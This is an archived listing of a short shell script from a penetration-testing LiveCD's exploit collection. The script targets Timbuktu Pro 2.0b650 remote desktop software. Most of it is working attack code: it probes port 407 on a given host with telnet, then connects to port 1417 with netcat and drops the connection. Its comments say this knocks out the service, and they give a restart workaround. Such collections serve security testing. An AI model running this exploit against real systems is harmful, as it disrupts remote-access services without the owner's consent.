Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / remotedesktop / timbuktu / timbuktu20.sh < prev

Wrap

Linux/UNIX/POSIX Shell Script | 2005-02-12 | 2KB | 58 lines

#!/bin/sh ########################################## # eth0 is a member of b0f/buffer0verfl0w security # # http://b0f.freebsd.lublin.pl # ######################################### # *Needs netcat in order to work......* # Immune systems: # Timbuktu Pro 2000 # # Vulnerable systems: # Timbuktu Pro 2.0b650 (Also incorrectly known as Timbukto) # # Exploit: # - Connect and disconnect to port TCP/407 and port TCP/1417 will start # listening. # - Connect on port TCP/1417 (using a simple telnet client). # - Disconnect from TCP/1417 (with no data exchange). # # Workaround: # - Kill Timbuktu process (using pslist/pskill for example). # - Stop Timbuktu services. # - Start them again. echo "Exploit:" echo " - Connect and disconnect to port TCP/407 and port TCP/1417 will start listening." echo " - Connect on port TCP/1417 (using a simple telnet client)." echo " - Disconnect from TCP/1417 (with no data exchange)." echo "Coded: eth0 from buffer0vefl0w security (b0f)" echo "[http://b0f.freebsd.lublin.pl]" echo "Checking if host is actually listening on port 407" telnet $1 407 1>.timb.tmp 2>.timb.tmp & echo "Sleeping 5 seconds..." sleep 5 killall -9 telnet 1>/dev/null 2>/dev/null cat .timb.tmp | grep "Connected" >/dev/null 2>&1 if [ $? -eq 0 ]; then timb="1" echo "[$1] is listening on port 407..." echo "Exploiting:..." nc $1 1417 1>/dev/null 2>/dev/null sleep 3 killall -9 nc 1>/dev/null 2>/dev/null echo "Done!!" fi if [ "$timb" != "1" ]; then echo "[$1] Is not listening on port 407 = doesn't exist..." fi # http://b0f.freebsd.lublin.pl #